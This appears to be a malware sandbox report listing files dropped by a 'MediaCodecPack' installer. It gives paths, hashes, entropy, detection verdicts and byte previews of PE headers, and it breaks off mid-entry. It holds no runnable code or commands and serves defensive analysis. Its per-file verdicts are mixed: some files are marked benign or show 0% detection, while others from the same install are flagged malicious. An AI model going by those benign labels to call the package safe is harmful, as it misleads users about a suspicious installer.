                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                      Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      File Type:ISO-8859 text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8
                                                                                      Entropy (8bit):2.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Gllln:G/l
                                                                                      MD5:1BA912D0AF3D27F7DAF293E886D0A941
                                                                                      SHA1:868BD880A8471BB99CA942E602846D2A0F6E66B1
                                                                                      SHA-256:635D4A628D1CFB24E09AA2EA3437B51E8504191A394481710FB0D3E35783343C
                                                                                      SHA-512:359B15A505EB1A1848B8D3A9571F7A4632D1CEF46B97F8202069A91F37AD9A58B608421B62286069F9AFB738AC205B610A04FE889DE14BF95A07C2B5A53F258F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..bg....
                                                                                      Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):0.8112781244591328
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:M:M
                                                                                      MD5:4352D88A78AA39750BF70CD6F27BCAA5
                                                                                      SHA1:3C585604E87F855973731FEA83E21FAB9392D2FC
                                                                                      SHA-256:67ABDD721024F0FF4E0B3F4C2FC13BC5BAD42D0B7851D456D88D203D15AAA450
                                                                                      SHA-512:EDF92E3D4F80FC47D948EA2F17B9BFC742D34E2E785A7A4927F3E261E8BD9D400B648BFF2123B8396D24FB28F5869979E08D58B4B5D156E640344A2C0A54675D
                                                                                      Malicious:false
                                                                                      Reputation:moderate, very likely benign file
                                                                                      Preview:....
                                                                                      Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):128
                                                                                      Entropy (8bit):2.9012093522336393
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ObXXXd0AbDBdUBWetxt:Or9Lb3UFx
                                                                                      MD5:679DD163372163CD8FFC24E3C9E758B3
                                                                                      SHA1:F307C14CA65810C8D0238B89B49B2ACD7C5B233B
                                                                                      SHA-256:510EA89D00FA427C33BD67AEEA60D21066976F085959C2AFE1F69411A8CA722D
                                                                                      SHA-512:46C464F15BCE39E28DCD48AF36C424845631D2B48D7E37D7FBBBEE0BC4DF32445A2810E397BF29FCA76C0364B1AA30CC05DCF4D9E799C6C697B49A174560969C
                                                                                      Malicious:false
                                                                                      Preview:12b48997735ce8b4537cf99be74bb62f518d3799011c89eb7c719048e83fac56................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1645320
                                                                                      Entropy (8bit):6.787752063353702
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                      MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                      SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                      SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                      SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1645320
                                                                                      Entropy (8bit):6.787752063353702
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:Fk18V2mHkfIE3Ip9vkWEgDecZV3W9kpOuRw8RhWd5Ixwzr6lOboU7j97S9D+z98v:FZNkf+uW3D1ZVG9kVw8I5Rv6lwH9+X
                                                                                      MD5:871C903A90C45CA08A9D42803916C3F7
                                                                                      SHA1:D962A12BC15BFB4C505BB63F603CA211588958DB
                                                                                      SHA-256:F1DA32183B3DA19F75FA4EF0974A64895266B16D119BBB1DA9FE63867DBA0645
                                                                                      SHA-512:985B0B8B5E3D96ACFD0514676D9F0C5D2D8F11E31F01ACFA0F7DA9AF3568E12343CA77F541F55EDDA6A0E5C14FE733BDA5DC1C10BB170D40D15B7A60AD000145
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s...7o..7o..7o...L..<o..7o..en...L..$o...L...o...L..6o...L..6o...L..(n...L..6o..Rich7o..................PE..L.....D@...........!.........`.......Q.......`.....p................................................................l...CN..|...x....p...........................s.....8...............................................0............................text...n........................... ..`.data...X...........................@...Shared.......`.......P..............@....rsrc........p... ...`..............@..@.reloc...s..........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):645592
                                                                                      Entropy (8bit):6.50414583238337
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                      Category:dropped
                                                                                      Size (bytes):78183
                                                                                      Entropy (8bit):7.692742945771669
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                      MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                      SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                      SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                      SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                      Malicious:false
                                                                                      Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):3193465
                                                                                      Entropy (8bit):6.245419443726979
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:vG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:O1VWIkOISM89ra7Xq1WkW4rJ
                                                                                      MD5:E9385FAE29EC4352F30C9140C9844332
                                                                                      SHA1:1BB2B802B8AD1324638E96199FF60648918BA8CB
                                                                                      SHA-256:47F7DE0DD6E931B6D8200B4CF675082C77F01861784A3E3358F8A0657F4430BA
                                                                                      SHA-512:B3ADCF8AB4C658AC246772B151B7C2762A64BA40C00EF207493EC72CB15414DF08EC6774D4A1D064F00E93BCED9D174466C5B247E4795D81D27304C5924F80CA
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-F43ND.tmp, Author: Joe Security
                                                                                      Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.....m.0.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4...@......y>...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499712
                                                                                      Entropy (8bit):6.414789978441117
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                      MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                      SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                      SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                      SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):348160
                                                                                      Entropy (8bit):6.542655141037356
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                      MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                      SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                      SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                      SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):176128
                                                                                      Entropy (8bit):6.204917493416147
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                      MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                      SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                      SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                      SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                      Category:dropped
                                                                                      Size (bytes):78183
                                                                                      Entropy (8bit):7.692742945771669
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Bkt2SjEQ3r94YqwyadpL1X6Dtn4afF1VowWb8ZmmUQNk3gNqCLbMsFxJse8hbpmn:mR/CYj9dp5XIyI2b/mY3gNjLbMsOaP
                                                                                      MD5:B1B9E6D43319F6D4E52ED858C5726A97
                                                                                      SHA1:5033047A30CCCF57783C600FD76A6D220021B19D
                                                                                      SHA-256:8003A4A0F9F5DFB62BEFBF81F8C05894B0C1F987ACFC8654A6C6CE02B6213910
                                                                                      SHA-512:E56D6EC9170DEBAC28BB514942F794F73D4C194D04C54EFF9227B6EE3C74BA4FCF239FFF0BB6556DC8B847FA89D382AF206A2C481C41A3510936B0A74192D2C2
                                                                                      Malicious:false
                                                                                      Preview:ITSF....`..........E.......|.{.......".....|.{......."..`...............x.......T.......................g1..............ITSP....T...........................................j..].!......."..T...............PMGLW................/..../#IDXHDR...F.../#ITBITS..../#IVB...N$./#STRINGS.....P./#SYSTEM..N.'./#TOPICS...F.0./#URLSTR...:.t./#URLTBL...v.D./$FIftiMain......1./$OBJINST...z.../$WWAssociativeLinks/..../$WWAssociativeLinks/Property...v../$WWKeywordLinks/..../$WWKeywordLinks/Property...r../After.jpg...4..../Auto-.hhc...^./Auto-Adjustment.htm....?./Auto-BleachTeeth.htm...z.3./Auto-Crop2Plus.htm..U.j./Auto-Emphasis.htm...w.V./Auto-EyeColor.htm...!.../Auto-EyePencil.htm..._.../Auto-EyeShadow.htm...,.3./Auto-GettingStarted.htm....Q./Auto-Lipstick.htm..R.M./Auto-Liquify.htm...-.v./Auto-Menu.htm..S.r./Auto-OrderingInformation.htm...Q.../Auto-Overview.htm..^.$./Auto-Powder.htm......./Auto-Resize.htm..s.b./Auto-Rotation.htm..?.e./Auto-Rouge.htm...=.d./Auto-SkinCare.htm...|.{./Auto-SmartPatchCosmet
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):176128
                                                                                      Entropy (8bit):6.204917493416147
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:l9iEoC1+7N9UQV2Mi8NTUU3/EO3h3E9y6GeoPRtsoWhi75MUbvSHQ:l+ssU62Mi8x9P/UVGeQRthMUbvS
                                                                                      MD5:FEC4FF0C2967A05543747E8D552CF9DF
                                                                                      SHA1:B4449DC0DF8C0AFCC9F32776384A6F5B5CEDE20C
                                                                                      SHA-256:5374148EBCF4B456F8711516A58C9A007A393CA88F3D9759041F691E4343C7D6
                                                                                      SHA-512:93E3F48CD393314178CBC86F6142D577D5EAAE52B47C4D947DBA4DFB706860B150FF5B0E546CB83114CA44666E9DF6021964D79D064B775A58698DAA9550EF13
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+0.J^..J^..J^.cE...J^..VR..J^..UU..J^.#VP..J^..UT..J^..UZ..J^..kU..J^..kZ..J^..J_..J^..iT..J^..io..J^.gLX..J^._jZ..J^.Rich.J^.................PE..L.....L...........!.....0...@.......'.......@...................................................................... e..k....X..d....`.......................p..p....................................................@...............................text....".......0.................. ..`.rdata...%...@...0...@..............@..@.data...T....p... ...p..............@....rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):3193465
                                                                                      Entropy (8bit):6.245419881846555
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:IG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:B1VWIkOISM89ra7Xq1WkW4rJ
                                                                                      MD5:49FC2D4BA26F2EEF94CCC6B71EB0AD96
                                                                                      SHA1:BC2B35A763A9B6EF1CDB599FE1AD5933B528E9E0
                                                                                      SHA-256:FD66C66EF0DAD6BAA7DE9CFA8CD552D8D44DFB09531110EF3CE9D7B851BB5E0B
                                                                                      SHA-512:73A58CB7F609F1BD049EEDDA9D295D07437E35D2D17ACC6C5D4A774710A50C134770031800033A943898E6848358DBC573168CBC199DF4848F46CDD7C5936BD3
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.....m.0.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4...@......y>...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):499712
                                                                                      Entropy (8bit):6.414789978441117
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:fJzxYPVsBnxO/R7krZhUgiW6QR7t5k3Ooc8iHkC2eq:fZxvBnxOJ7ki3Ooc8iHkC2e
                                                                                      MD5:561FA2ABB31DFA8FAB762145F81667C2
                                                                                      SHA1:C8CCB04EEDAC821A13FAE314A2435192860C72B8
                                                                                      SHA-256:DF96156F6A548FD6FE5672918DE5AE4509D3C810A57BFFD2A91DE45A3ED5B23B
                                                                                      SHA-512:7D960AA8E3CCE22D63A6723D7F00C195DE7DE83B877ECA126E339E2D8CC9859E813E05C5C0A5671A75BB717243E9295FD13E5E17D8C6660EB59F5BAEE63A7C43
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................................................Rich...................PE..L.....w>...........!.................-............:|................................~e..............................$...?...d!..<....`.......................p...0..8...8...............................H............................................text............................... ..`.rdata..2*.......0..................@..@.data...h!...0... ...0..............@....rsrc........`.......P..............@..@.reloc...0...p...@...`..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):348160
                                                                                      Entropy (8bit):6.542655141037356
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:OcV9z83OtqxnEYmt3NEnvfF+Tbmbw6An8FMciFMNrb3YgxxpbCAOxO2ElvlE:Ooz83OtIEzW+/m/AyF7bCrO/E
                                                                                      MD5:86F1895AE8C5E8B17D99ECE768A70732
                                                                                      SHA1:D5502A1D00787D68F548DDEEBBDE1ECA5E2B38CA
                                                                                      SHA-256:8094AF5EE310714CAEBCCAEEE7769FFB08048503BA478B879EDFEF5F1A24FEFE
                                                                                      SHA-512:3B7CE2B67056B6E005472B73447D2226677A8CADAE70428873F7EFA5ED11A3B3DBF6B1A42C5B05B1F2B1D8E06FF50DFC6532F043AF8452ED87687EEFBF1791DA
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..S..S..S..Tp..S..S..5S..BX..S..BX...S..BX..Q..BX..S..BX..S..BX..S..Rich.S..........................PE..L.....V>...........!................."............4|.........................`......................................t....C......(.... .......................0..d+..H...8...........................x...H...............l............................text............................... ..`.rdata..@...........................@..@.data... h.......`..................@....rsrc........ ......................@..@.reloc..d+...0...0... ..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):645592
                                                                                      Entropy (8bit):6.50414583238337
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):717985
                                                                                      Entropy (8bit):6.51490177808013
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
                                                                                      MD5:C1270D7DFE9B50EF58128A8A0BDD34D3
                                                                                      SHA1:8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
                                                                                      SHA-256:F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
                                                                                      SHA-512:B299367DF684BC218723BC478435CAD8F40F7ABD43B5B4DE78F00D0BF4C0EB06639788C26DA64046FDCF2EE850F6D645BF843DB11516497E42C58A14498A835C
                                                                                      Malicious:true
                                                                                      Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:InnoSetup Log MediaCodecPack, version 0x30, 4691 bytes, 216865\user, "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11"
                                                                                      Category:dropped
                                                                                      Size (bytes):4691
                                                                                      Entropy (8bit):4.725430655260978
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Le2bBdWO38DpTlII39V+eOIhj6a7ICSss/LnZTxE/5YJzjJ9JbxcPt:C2ddWO3opTliHIhjFICSsAnZTy/5YJzU
                                                                                      MD5:1055BF8E18FA55068A8B43B1345C46BB
                                                                                      SHA1:1CAE2E1F3D25AE2A9FE1A932BDA9E5D07EEAE87A
                                                                                      SHA-256:51C96E2174D2D8BF0150232D7D2955C095D488CE4E3AD3AA56814C7A78396972
                                                                                      SHA-512:E0824BC2C809A9C9688790DFF98589A40D2FC3BA63434F5CB051B03B27F216AC61B9B60955C86C8982728B8F16CAC68584D85DBF446330D15A8FD9643E88CED9
                                                                                      Malicious:false
                                                                                      Preview:Inno Setup Uninstall Log (b)....................................MediaCodecPack..................................................................................................................MediaCodecPack..................................................................................................................0.......S...%................................................................................................................{.T.........=f[......R....216865.user2C:\Users\user\AppData\Local\MediaCodecPack 1.0.11...........9...... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User
                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):717985
                                                                                      Entropy (8bit):6.51490177808013
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:FTPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+AIq5MRxyFw:NPcYn5c/rPx37/zHBA6pFptZ1CENqMR1
                                                                                      MD5:C1270D7DFE9B50EF58128A8A0BDD34D3
                                                                                      SHA1:8AE6DAE0B1B12F22A751902CD95F19F27BCC30FA
                                                                                      SHA-256:F2859E4DA15F04941801E71E6F4384D25EF13DA6F1ED24415D6C2F1CDEDEAF45
